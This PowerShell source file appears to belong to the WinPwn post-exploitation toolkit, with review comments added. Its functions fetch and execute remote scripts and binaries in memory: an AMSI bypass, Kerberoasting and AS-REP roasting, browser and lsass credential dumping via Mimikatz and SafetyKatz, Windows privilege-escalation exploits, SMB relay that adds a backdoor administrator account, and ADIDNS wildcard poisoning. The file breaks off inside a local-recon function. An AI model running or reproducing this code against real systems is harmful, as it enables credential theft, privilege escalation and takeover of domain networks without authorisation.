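#Zipping Function
Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip
{
<#
.DESCRIPTION
Extracts a zip archive into a directory using System.IO.Compression.ZipFile.
Relative paths are resolved against the current PowerShell location before the
.NET call, because ZipFile.ExtractToDirectory resolves relative paths against the
process working directory ([Environment]::CurrentDirectory), which Set-Location /
Push-Location do not update and which can therefore point somewhere else.
.PARAMETER zipfile
Path to the archive to extract.
.PARAMETER outpath
Directory to extract into.
.NOTES
Errors from the .NET call (missing or invalid archive, existing target files)
surface unchanged, as the same MethodInvocationException the original raised.
Requires the System.IO.Compression.FileSystem assembly loaded above.
#>
param([string]$zipfile, [string]$outpath)
$pathResolver = $ExecutionContext.SessionState.Path
# Only rewrite non-empty inputs; empty strings are left for the .NET call to reject
# exactly as before.
$zipFull = $zipfile
if ($zipfile) { $zipFull = $pathResolver.GetUnresolvedProviderPathFromPSPath($zipfile) }
$outFull = $outpath
if ($outpath) { $outFull = $pathResolver.GetUnresolvedProviderPathFromPSPath($outpath) }
[System.IO.Compression.ZipFile]::ExtractToDirectory($zipFull, $outFull)
}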
function AmsiBypass
{
<#
.DESCRIPTION
Amsi bypass by https://github.com/rasta-mouse/AmsiScanBufferBypass
License: BSD 3-Clause
.NOTES
The bypass itself is not in this file: a script is fetched from a fixed
raw.githubusercontent.com URL at call time and run with iex in the current
session. Nothing verifies what was downloaded (no hash or signature check),
so what this function does is whatever that remote file contains when it is
fetched. The outbound request and the in-memory iex are the events visible
on the host.
#>
# The "Privilege Escalation Phase" marker looks copied from the neighbouring
# functions; this function only loads the remote script.
#Privilege Escalation Phase
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/amsi.ps1')
}
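function dependencychecks
{
<#
.DESCRIPTION
Checks for System Role, Powershell Version, Proxy active/not active, Elevated or non elevated Session.
Creates the Log directories or checks if they are already available.
Author: @securethisshit
License: BSD 3-Clause
.NOTES
Calls proxydetect and pathcheck (defined elsewhere in this file) before the
version and role checks. Exits the hosting session when the PowerShell major
version is below 2. On a machine that is not a domain member it prints a
warning and waits for the user to press Enter.
#>
#Privilege Escalation Phase
# Display names for Win32_ComputerSystem.DomainRole. The surrounding spaces are
# part of the console output format.
$systemRoles = @{
0 = " Standalone Workstation " ;
1 = " Member Workstation " ;
2 = " Standalone Server " ;
3 = " Member Server " ;
4 = " Backup Domain Controller " ;
5 = " Primary Domain Controller "
}
#Proxy Detect #1
proxydetect
pathcheck
# $PSVersionTable does not exist on PowerShell v1; $PSVersion is then $null and the
# "-lt 2" check below still fires.
$PSVersion = $PSVersionTable.PSVersion.Major
write-host "[?] Checking for Default PowerShell version ..`n" -ForegroundColor black -BackgroundColor white ; Start-Sleep -Seconds 1
if($PSVersion -lt 2){
Write-Warning "[!] You have PowerShell v1.0.`n"
Write-Warning "[!] This script only supports Powershell verion 2 or above.`n"
# exit ends the whole session, not just this function - intentional, nothing else
# in the script runs on v1.
exit
}
write-host " [+] -----> PowerShell v$PSVersion`n" ; Start-Sleep -Seconds 1
write-host "[?] Detecting system role ..`n" -ForegroundColor black -BackgroundColor white ; Start-Sleep -Seconds 1
# Single WMI query (the original ran it twice). A failed query yields $null, which
# casts to 0 and is reported as "Standalone Workstation".
[int]$systemRoleID = $(get-wmiObject -Class Win32_ComputerSystem).DomainRole
# Roles 1, 3, 4 and 5 (member workstation, member server, backup DC, primary DC)
# are all domain members; only the standalone roles 0 and 2 lack domain access.
$domainMemberRoles = @(1, 3, 4, 5)
if($domainMemberRoles -notcontains $systemRoleID){
" [-] Some features in this script need access to the domain. They can only be run on a domain member machine. Pwn some domain machine for them!`n"
Read-Host "Type any key to continue .."
}
write-host " [+] ----->",$systemRoles[[int]$systemRoleID],"`n" ; Start-Sleep -Seconds 1
}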
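function pathCheck
{
<#
.DESCRIPTION
Checks for correct path dependencies.
Ensures the log folders the other modules write into exist below the current
working directory and creates any that are missing.
Author: @securethisshit
License: BSD 3-Clause
.NOTES
Directory-creation output is suppressed; the folder list is announced via Write-Host.
#>
#Dependency Check
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
Write-Host -ForegroundColor Yellow 'Creating/Checking Log Folders in '$currentPath' directory:'
# DomainRecon\ADrecon is listed on its own so it is also created when DomainRecon
# already exists but the ADrecon subfolder does not (the original only created it
# together with a new DomainRecon). The duplicate LocalPrivEsc entry is gone.
$logFolders = @(
'LocalRecon',
'DomainRecon',
'DomainRecon\ADrecon',
'LocalPrivEsc',
'Exploitation',
'Vulnerabilities'
)
foreach ($folder in $logFolders)
{
$target = Join-Path -Path $currentPath -ChildPath $folder
# -PathType Container: a plain file with the same name must not count as present.
if(!(Test-Path -Path $target -PathType Container))
{
$null = New-Item -Path $target -ItemType Directory
}
}
}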
function sharpcradle{
<#
.DESCRIPTION
Download .NET Binary to RAM.
Author: @securethisshit
License: BSD 3-Clause
.PARAMETER allthosedotnet
When $true, runs the fixed list of Ghostpack binaries below (Seatbelt, Rubeus,
Watson, SharpWeb, SharpUp, and SafetyKatz when elevated), appending their output
to files under $currentPath. $url and the argument parameters are ignored.
.PARAMETER polar
When $true (and $allthosedotnet is $false), runs the interactive CVE-2019-1069 /
ByeBear branch instead of the generic loader.
.PARAMETER url
URL of the .NET binary to load. Prompted for when empty in the generic branch.
.PARAMETER argument1
First argument forwarded to Invoke-Sharpcradle (generic branch only).
.PARAMETER argument2
Second argument; only used when argument1 is also set.
.PARAMETER argument3
Third argument; only used when argument1 and argument2 are both set and all three
were passed as parameters (the interactive prompts stop after argument2).
.NOTES
Every branch first fetches Invoke-Sharpcradle.ps1 from a raw GitHub URL and runs it
with iex, so the function depends on network access and on that remote content.
Nothing below verifies the downloaded scripts or binaries.
#>
Param
(
[bool]
$allthosedotnet,
[bool]
$polar,
[string]
$url,
[string]
$argument1,
[string]
$argument2,
[string]
$argument3
)
# Ensure the output folders exist; the log paths below are built from $currentPath.
pathcheck
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
if ($allthosedotnet)
{
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
Write-Host -ForegroundColor Yellow 'Executing Seatbelt. Output goes to .\LocalRecon\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/Seatbelt.exe -argument1 all >> $currentPath\LocalRecon\SeatBeltOutput.txt
Write-Host -ForegroundColor Yellow 'Doing Kerberoasting + ASRepRoasting. Output goes to .\Exploitation\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/Rubeus.exe -argument1 asreproast -argument2 "/format:hashcat" >> $currentPath\Exploitation\ASreproasting.txt
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/Rubeus.exe -argument1 kerberoast -argument2 "/format:hashcat" >> $currentPath\Exploitation\Kerberoasting_Rubeus.txt
Write-Host -ForegroundColor Yellow 'Checking for vulns using Watson. Output goes to .\Vulnerabilities\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/Watson.exe >> $currentPath\Vulnerabilities\Privilege_Escalation_Vulns.txt
Write-Host -ForegroundColor Yellow 'Getting all theese Browser Creds using Sharpweb. Output goes to .\Exploitation\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/SharpWeb.exe -argument1 all >> $currentPath\Exploitation\Browsercredentials.txt
Write-Host -ForegroundColor Yellow 'Searching for Privesc vulns. Output goes to .\Vulnerabilities\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/SharpUp.exe >> $currentPath\Vulnerabilities\Privilege_Escalation_Vulns_SharpUp.txt
# Elevated-only steps. The SharpUp audit run appends to the same file as the
# unelevated run above, so that file holds both outputs.
if (isadmin)
{
Write-Host -ForegroundColor Yellow 'Searching for Privesc vulns. Output goes to .\Vulnerabilities\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/SharpUp.exe -argument1 audit >> $currentPath\Vulnerabilities\Privilege_Escalation_Vulns_SharpUp.txt
Write-Host -ForegroundColor Yellow 'Safetykatz ftw. Output goes to .\Exploitation\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/SafetyKatz.exe >> $currentPath\Exploitation\SafetyCreds.txt
}
# NOTE(review): the Watson output is read back through a path relative to the current
# location, while it was written via $currentPath; the two only agree while the
# location has not changed. -match on the array returns the matching lines, so this
# is truthy when any line contains the marker.
If((Get-Content .\Vulnerabilities\Privilege_Escalation_Vulns.txt) -match "CVE-2019-0841 : VULNERABLE")
{
# Fixed C:\temp drop location and a fixed local port; both are predictable on-disk /
# on-host artefacts of this branch.
if(!(Test-Path -Path C:\temp\)){mkdir C:\temp}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-Webrequest -Uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/nc.exe -Outfile C:\temp\nc.exe
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/privesc.exe -argument1 license.rtf
Start-Sleep -Seconds 3
# Runs in a separate PowerShell window; what listens on 127.0.0.1:2000 is not visible here.
cmd /c start powershell -Command {C:\temp\nc.exe 127.0.0.1 2000}
}
}
if ($polar)
{
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
$polaraction = Read-Host -Prompt 'Do you have a valid username and password for CVE-2019-1069?'
if ($polaraction -eq "yes" -or $polaraction -eq "y" -or $polaraction -eq "Yes" -or $polaraction -eq "Y")
{
# Read-Host without -AsSecureString: the password is a plain string from here on and
# is placed on the Invoke-Sharpcradle command line below (visible to script block
# logging / transcripts).
$username = Read-Host -Prompt 'Please enter the username'
$password = Read-Host -Prompt 'Please enter the password'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# Three support files are dropped next to the script and removed again further down.
Invoke-Webrequest -Uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/schedsvc.dll -Outfile $currentPath\schedsvc.dll
Invoke-Webrequest -Uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/schtasks.exe -Outfile $currentPath\schtasks.exe
Invoke-Webrequest -Uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/test.job -Outfile $currentPath\test.job
# Is64BitProcess describes this PowerShell process, not the OS: a 32-bit host on a
# 64-bit OS takes the x86 branch. $username/$password follow -argument1 as positional
# values; how Invoke-Sharpcradle binds them is not visible here - TODO confirm.
if ([Environment]::Is64BitProcess)
{
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpPolarbear.exe -argument1 license.rtf $username $password
Start-Sleep -Seconds 1.5
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpPolarbear.exe -argument1 license.rtf $username $password
}
else
{
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpPolarbearx86.exe -argument1 license.rtf $username $password
Start-Sleep -Seconds 1.5
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpPolarbearx86.exe -argument1 license.rtf $username $password
}
# NOTE(review): "env:USERPROFILE" has no leading "$", so this is not expanded to the
# profile directory; as written the source path looks wrong - confirm intended.
move env:USERPROFILE\Appdata\Local\temp\license.rtf C:\windows\system32\license.rtf
del .\schedsvc.dll
del .\schtasks.exe
del C:\windows\system32\tasks\test
}
else
{
$system = Read-Host -Prompt 'You can also try to elevate privileges using the last sandboxescaper vuln (ByeBear). Lets do it? (y/n)'
# NOTE(review): the prompt asks whether to run ByeBear, but this branch runs it when
# the answer is "no"/"n" and does nothing on "yes". Looks inverted - confirm intended.
if ($system -eq "no" -or $system -eq "n" -or $system -eq "No" -or $system -eq "N")
{
# Two attempts, 15 s apart, each requiring the operator to interact with the desktop.
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpByeBear.exe -argument1 "license.rtf 2"
Write-Host -ForegroundColor Yellow 'Click into the search bar on your lower left side'
Start-Sleep -Seconds 15
Write-Host 'Next Try..'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpByeBear.exe -argument1 "license.rtf 2"
Write-Host -ForegroundColor Yellow 'Click into the search bar on your lower left side'
Start-Sleep -Seconds 15
}
}
}
else
{
# Generic loader: run an arbitrary .NET binary from $url with up to three arguments,
# prompting for whatever was not supplied. Note: with $allthosedotnet set this whole
# branch is skipped even if $polar is also set.
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
if ($url)
{
if ($argument1)
{
if ($argument2)
{
if($argument3)
{
Invoke-Sharpcradle -uri $url -argument1 $argument1 -argument2 $argument2 -argument3 $argument3
}
else{Invoke-Sharpcradle -uri $url -argument1 $argument1 -argument2 $argument2}
}
else{Invoke-Sharpcradle -uri $url -argument1 $argument1}
}
else
{
# $url given but no arguments: ask interactively (at most two arguments here).
$arg = Read-Host -Prompt 'Do you need to set custom parameters / arguments for the executable?'
if ($arg -eq "yes" -or $arg -eq "y" -or $arg -eq "Yes" -or $arg -eq "Y")
{
$argument1 = Read-Host -Prompt 'Enter argument1 for the executable file:'
$arg1 = Read-Host -Prompt 'Do you need more arguments for the executable?'
if ($arg1 -eq "yes" -or $arg1 -eq "y" -or $arg1 -eq "Yes" -or $arg1 -eq "Y")
{
$argument2 = Read-Host -Prompt 'Enter argument2 for the executable file:'
Invoke-Sharpcradle -uri $url -argument1 $argument1 -argument2 $argument2
}
else{Invoke-Sharpcradle -uri $url -argument1 $argument1}
}
else
{
Invoke-Sharpcradle -Uri $url
}
}
}
else
{
# No $url: prompt for it, then the same argument dialogue as above. Any argument
# parameters passed in are ignored on this path.
$url = Read-Host -Prompt 'Please Enter an URL to a downloadable C# Binary to run in memory, for example https://github.com/SecureThisShit/Creds/raw/master/pwned_x64/notepad.exe'
$arg = Read-Host -Prompt 'Do you need to set custom parameters / arguments for the executable?'
if ($arg -eq "yes" -or $arg -eq "y" -or $arg -eq "Yes" -or $arg -eq "Y")
{
$argument1 = Read-Host -Prompt 'Enter argument1 for the executable file:'
$arg1 = Read-Host -Prompt 'Do you need more arguments for the executable?'
if ($arg1 -eq "yes" -or $arg1 -eq "y" -or $arg1 -eq "Yes" -or $arg1 -eq "Y")
{
$argument2 = Read-Host -Prompt 'Enter argument2 for the executable file:'
Invoke-Sharpcradle -uri $url -argument1 $argument1 -argument2 $argument2
}
else{Invoke-Sharpcradle -uri $url -argument1 $argument1}
}
else
{
Invoke-Sharpcradle -Uri $url
}
}
}
}
function isadmin
{
<#
.DESCRIPTION
Returns $true when the current process token is in the built-in Administrator
role (i.e. the session is elevated), otherwise $false.
#>
$identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object System.Security.Principal.WindowsPrincipal($identity)
$adminRole = [System.Security.Principal.WindowsBuiltInRole]::Administrator
return $principal.IsInRole($adminRole)
}
function Inveigh {
<#
.DESCRIPTION
Starts Inveigh in a parallel window.
Author: @securethisshit
License: BSD 3-Clause
.NOTES
Interactive. Two Read-Host questions select what runs:
 - SMB relay (first question): Inveigh-Relay and the Invoke-SMB* helpers are loaded
   into this session with iex and Invoke-InveighRelay is started against a
   user-supplied target; a second WinPwn window is opened first.
 - ADIDNS (second question): a new PowerShell window runs Invoke-Inveigh with
   -ADIDNS Combo. Otherwise a new window runs a plain Invoke-Inveigh.
Each new window loads an AMSI bypass script and Inveigh.ps1 from raw GitHub URLs
with iex before starting; the elevated variants also enable the mDNS, HTTPS and
Proxy options. The script blocks handed to "cmd /c start powershell -Command" are
evaluated in the child process, so the variables inside them are the child's.
#>
pathcheck
# NOTE(review): $currentip is assigned but never read in this function.
$currentip = Get-currentIP
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
$relayattacks = Read-Host -Prompt 'Do you want to execute SMB-Relay attacks? (yes/no)'
if ($relayattacks -eq "yes" -or $relayattacks -eq "y" -or $relayattacks -eq "Yes" -or $relayattacks -eq "Y")
{
Write-Host 'Starting WinPwn in a new window so that you can use this one for Invoke-TheHash'
# The single-quoted string is handed to invoke-expression, which opens a second
# PowerShell window that downloads and runs WinPwn.ps1 again.
invoke-expression 'cmd /c start powershell -Command {$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;IEX(New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn.ps1'');WinPwn;}'
$target = Read-Host -Prompt 'Please Enter an IP-Adress as target for the relay attacks'
$admingroup = Read-Host -Prompt 'Please Enter the name of your local administrators group: (varies for different countries)'
# NOTE(review): the proxy credentials are set on $Wcl, but each download below creates
# its own Net.WebClient, so $Wcl (and its proxy setting) is never actually used here.
$Wcl = new-object System.Net.WebClient
$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Inveigh-Relay.ps1")
IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Invoke-SMBClient.ps1")
IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Invoke-SMBEnum.ps1")
IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Invoke-SMBExec.ps1")
# -Command creates a local account with a fixed name and password on the relay target
# and adds it to $admingroup; these literals are a lasting, easily spotted artefact.
Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target $target -Command "net user pwned 0WnedAccount! /add; net localgroup $admingroup pwned /add" -Attack Enumerate,Execute,Session
Write-Host 'You can now check your sessions with Get-Inveigh -Session and use Invoke-SMBClient, Invoke-SMBEnum and Invoke-SMBExec for further recon/exploitation'
}
$adidns = Read-Host -Prompt 'Do you want to start Inveigh with Active Directory-Integrated DNS dynamic Update attack? (yes/no)'
if ($adidns -eq "yes" -or $adidns -eq "y" -or $adidns -eq "Yes" -or $adidns -eq "Y")
{
# The child picks its listening IP as the IPv4 address of the first adapter with a
# default gateway that is not disconnected, and writes Inveigh's file output to its
# own current directory.
if (isadmin)
{
cmd /c start powershell -Command {$IPaddress = Get-NetIPConfiguration | Where-Object {$_.IPv4DefaultGateway -ne $null -and $_.NetAdapter.Status -ne "Disconnected"};$currentPath = (Get-Item -Path ".\" -Verbose).FullName;$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/amsi.ps1');IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -ADIDNS Combo -ADIDNSThreshold 2 -IP $IPaddress.IPv4Address.IPAddress -FileOutput Y -FileOutputDirectory $currentPath\;}
}
else
{
cmd /c start powershell -Command {$IPaddress = Get-NetIPConfiguration | Where-Object {$_.IPv4DefaultGateway -ne $null -and $_.NetAdapter.Status -ne "Disconnected"};$currentPath = (Get-Item -Path ".\" -Verbose).FullName;$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/amsi.ps1');IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -ADIDNS Combo -ADIDNSThreshold 2 -IP $IPaddress.IPv4Address.IPAddress -FileOutput Y -FileOutputDirectory $currentPath\;}
}
}
else
{
# Same two windows without the ADIDNS options.
if (isadmin)
{
cmd /c start powershell -Command {$IPaddress = Get-NetIPConfiguration | Where-Object {$_.IPv4DefaultGateway -ne $null -and $_.NetAdapter.Status -ne "Disconnected"};$currentPath = (Get-Item -Path ".\" -Verbose).FullName;$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/amsi.ps1');IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -IP $IPaddress.IPv4Address.IPAddress -FileOutput Y -FileOutputDirectory $currentPath\;}
}
else
{
cmd /c start powershell -Command {$IPaddress = Get-NetIPConfiguration | Where-Object {$_.IPv4DefaultGateway -ne $null -and $_.NetAdapter.Status -ne "Disconnected"};$currentPath = (Get-Item -Path ".\" -Verbose).FullName;$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/amsi.ps1');IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -FileOutput Y -IP $IPaddress.IPv4Address.IPAddress -FileOutputDirectory $currentPath\;}
}
}
}
function adidnswildcard
{
<#
.DESCRIPTION
After an explicit confirmation prompt, loads Powermad.ps1 from a raw GitHub URL with
iex, creates a tombstoned ADIDNS wildcard node (New-ADIDNSNode -Node *), reminds the
operator to remove it again, and then calls the Inveigh function from this file.
As the prompt states, the wildcard record can disrupt name resolution for all clients
and servers in the domain until it is removed, so it is only created on a clear "yes".
Author: @securethisshit
License: BSD 3-Clause
#>
pathcheck
$adidns = Read-Host -Prompt 'Are you REALLY sure, that you want to create a Active Directory-Integrated DNS Wildcard record? This can in the worst case cause network disruptions for all clients and servers for the next hours! (yes/no)'
if ($adidns -eq "yes" -or $adidns -eq "y" -or $adidns -eq "Yes" -or $adidns -eq "Y")
{
IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Powermad.ps1")
# What -Tombstone changes about the created node is defined by Powermad, not visible here.
New-ADIDNSNode -Node * -Tombstone -Verbose
Write-Host -ForegroundColor Red 'Be sure to remove the record with `Disable-ADIDNSNode -Node * -Verbose` at the end of your tests'
Write-Host -ForegroundColor Yellow 'Starting Inveigh to capture all theese mass hashes:'
# Hands over to the interactive Inveigh function defined above.
Inveigh
}
}
function sessionGopher
{
<#
.DESCRIPTION
Starts SessionGopher to search for Cached Credentials.
Author: @securethisshit
License: BSD 3-Clause
.NOTES
Loads an obfuscated SessionGopher build (segoph.ps1) from a raw GitHub URL with iex,
then asks two yes/no questions (whole domain? thorough?) and runs one of four
"cachet" invocations. All output is appended to .\LocalRecon\SessionGopher.txt
below $currentPath.
#>
pathcheck
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/segoph.ps1')
$whole_domain = Read-Host -Prompt 'Do you want to start SessionGopher search over the whole domain? (yes/no) - takes a lot of time'
if ($whole_domain -eq "yes" -or $whole_domain -eq "y" -or $whole_domain -eq "Yes" -or $whole_domain -eq "Y")
{
$session = Read-Host -Prompt 'Do you want to start SessionGopher with thorough tests? (yes/no) - takes a fuckin lot of time'
if ($session -eq "yes" -or $session -eq "y" -or $session -eq "Yes" -or $session -eq "Y")
{
Write-Host -ForegroundColor Yellow 'Starting Local SessionGopher, output is generated in '$currentPath'\LocalRecon\SessionGopher.txt:'
# "cachet" and its switch names come from the obfuscated segoph.ps1 loaded above; from
# the surrounding prompts, -hdPXEKUQjxCYg9C presumably means "thorough" and
# -qMELeoMyJPUTJQY "whole domain" - TODO confirm against the script.
# NOTE(review): "-Outfile" is passed after the redirect with no value here and in the
# thorough/local branch, but not in the other two - confirm whether it is needed.
cachet -hdPXEKUQjxCYg9C -qMELeoMyJPUTJQY >> $currentPath\LocalRecon\SessionGopher.txt -Outfile
}
else
{
Write-Host -ForegroundColor Yellow 'Starting SessionGopher without thorough tests, output is generated in '$currentPath'\LocalRecon\SessionGopher.txt:'
cachet -qMELeoMyJPUTJQY >> $currentPath\LocalRecon\SessionGopher.txt
}
}
else
{
$session = Read-Host -Prompt 'Do you want to start SessionGopher with thorough tests? (yes/no) - takes a lot of time'
if ($session -eq "yes" -or $session -eq "y" -or $session -eq "Yes" -or $session -eq "Y")
{
Write-Host -ForegroundColor Yellow 'Starting Local SessionGopher, output is generated in '$currentPath'\LocalRecon\SessionGopher.txt:'
cachet -hdPXEKUQjxCYg9C >> $currentPath\LocalRecon\SessionGopher.txt -Outfile
}
else
{
Write-Host -ForegroundColor Yellow 'Starting SessionGopher without thorough tests,output is generated in '$currentPath'\LocalRecon\SessionGopher.txt:'
cachet >> $currentPath\LocalRecon\SessionGopher.txt
}
}
}
function kittielocal
{
<#
.DESCRIPTION
Dumps Credentials from Memory / SAM Database.
Author: @securethisshit
License: BSD 3-Clause
.NOTES
Runs the AmsiBypass function first, then loads two obfuscated scripts
(obfuskittie.ps1, DumpWCM.ps1) from raw GitHub URLs with iex. Elevated sessions
get a choice between a SafetyKatz cradle, an lsass dump (SafetyDump.ps1) and an
in-memory mimi.ps1 run; unelevated sessions only dump the Credential Manager and
run "inbox". Output files are appended under $currentPath\Exploitation\.
#>
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
pathcheck
AmsiBypass
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/obfuskittie.ps1')
# Invoke-WCMDump (used below) presumably comes from DumpWCM.ps1 and "inbox" from
# obfuskittie.ps1; neither definition is visible here - TODO confirm.
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/DumpWCM.ps1')
if (isadmin)
{
$safety = Read-Host -Prompt 'Execute safetykatz instead of invoke-kittie in memory? (recommended) (yes/no)'
if ($safety -eq "yes" -or $safety -eq "y" -or $safety -eq "Yes" -or $safety -eq "Y")
{
Invoke-WCMDump >> $currentPath\Exploitation\WCMCredentials.txt
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
$lsass = Read-Host -Prompt 'Only dump lsass without using the cat (more stealth)? (recommended) (yes/no)'
if ($lsass -eq "yes" -or $lsass -eq "y" -or $lsass -eq "Yes" -or $lsass -eq "Y")
{
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/SafetyDump.ps1')
# The dump location named in the message is chosen by SafetyDump.ps1, not here; a
# fixed path under C:\windows\temp is a predictable on-disk artefact.
Write-Host -ForegroundColor Yellow 'Dumping lsass to C:\windows\temp\debug.bin :'
Safetydump
}
# Note the "blob/...?raw=true" URL form here, unlike the "raw/master" form used elsewhere.
else{Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/blob/master/Ghostpack/SafetyKatz.exe?raw=true}
}
else
{
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/mimi.ps1')
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Get-WLAN-Keys.ps1')
Write-Host -ForegroundColor Yellow 'Dumping Windows Credential Manager:'
Invoke-WCMDump >> $currentPath\Exploitation\WCMCredentials.txt
$output_file = Read-Host -Prompt 'Save credentials to a local text file? (yes/no)'
if ($output_file -eq "yes" -or $output_file -eq "y" -or $output_file -eq "Yes" -or $output_file -eq "Y")
{
# Plain-text credential files on disk: Credentials.txt and WIFI_Keys.txt.
Write-Host -ForegroundColor Yellow 'Dumping Credentials from lsass.exe:'
Invoke-Mimikatz >> $currentPath\Exploitation\Credentials.txt
Get-WLAN-Keys >> $currentPath\Exploitation\WIFI_Keys.txt
}
else
{
# Console output only.
Invoke-Mimikatz
Get-WLAN-Keys
}
}
}
else
{
Write-Host -ForegroundColor Yellow 'You need local admin rights for this, only dumping Credential Manager now!'
Write-Host -ForegroundColor Yellow 'Dumping Windows Credential Manager:'
Invoke-WCMDump >> $currentPath\Exploitation\WCMCredentials.txt
Write-Host -ForegroundColor Yellow 'Running the small kittie:'
inbox >> $currentPath\Exploitation\kittenz.txt
}
}
function localreconmodules
{
<#
.DESCRIPTION
All local recon scripts are executed here.
Author: @securethisshit
License: BSD 3-Clause
#>
#Local Reconning
pathcheck
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Get-ComputerDetails.ps1')
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/view.ps1')
Write-Host -ForegroundColor Yellow 'Starting local Recon phase:'
